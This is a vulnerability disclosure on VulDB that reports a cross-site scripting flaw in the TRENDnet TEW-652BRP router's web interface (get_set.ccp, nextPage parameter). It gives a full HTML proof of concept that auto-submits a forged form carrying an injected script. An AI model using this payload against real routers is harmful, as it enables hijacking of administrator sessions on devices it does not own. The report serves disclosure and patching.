Submeter #78681: An XSS on TRENDnet router TEW-652BRPinformação

Título	An XSS on TRENDnet router TEW-652BRP
Descrição	# XSS on TRENDnet router TEW-652BRP ## Overview * Type: XSS * Supplier: TRENDNet (https://www.trendnet.com/) * Product: TRENDNet TEW-652BRP (Version v3.2R, https://www.trendnet.com/support/support-detail.asp?prod=235_TEW-652BRP) * Firmware download: https://downloads.trendnet.com/tew-652brp_v3.2/firmware/fw_tew-652brp_v3(3.04b01).zip * Affect version: latest version 3.04B01 * Bug URL: http://192.168.10.1/get_set.ccp ## Description An XSS vulnerability exits at a parameter of post request which is triggered after logging in to the web. The device uses a plaintext password to log in web, so it's easy to leak passwords from the HTTP flow. This vulnerability can be exploited easily. ## Reproduce and PoC ### Steps to Reproduce I have put the PoC(HTML code) in the next section. You need to configure the device's web IP address in the URL. Log in to the web management interface in the browser, then open the PoC on a new page, and an alert will pop up. Note: The alert window flashes before going to the next page, so I suggest using burpsuite proxy to slow down the speed. You can also check the response to locate XSS injection. ### Proof of Concept Below is PoC(HTML code), save the code into a file(xss.html). Open it in the browser after logging in to the web target. ``` <!DOCTYPE html> <html> <head> <script> window.onload = function() { document.getElementById("postsubmit").click(); } </script> <meta charset="utf-8"> <title></title> </head> <body> <form method="post" action="http://192.168.10.1/get_set.ccp"> <input id="ccp_act" type="text" name="ccp_act" value="set"/> <input id="ccpSubEvent" type="text" name="ccpSubEvent" value="CCP_SUB_URLFILTER"/> <input id="nextPage" type="text" name="nextPage" value="domain_filter.htm');alert('XSS');//"/> <input id="urlFilterList_ManagedURL_1.1.2.0.0" type="text" name="urlFilterList_ManagedURL_1.1.2.0.0" value="dummy.org"/> <input id="postsubmit" type="submit" value="submit" /> </form> </body> </html> ```
Utilizador	leetsun (UID 39457)
Submissão	27/01/2023 14h06 (há 3 anos)
Moderação	02/02/2023 09h10 (6 days later)
Estado	Aceite
Entrada VulDB	220019 [TRENDnet TEW-652BRP 3.04b01 Web Management Interface get_set.ccp nextPage Script de Site Cruzado]
Pontos	17

◂ Voltar Visão Geral Próximo ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!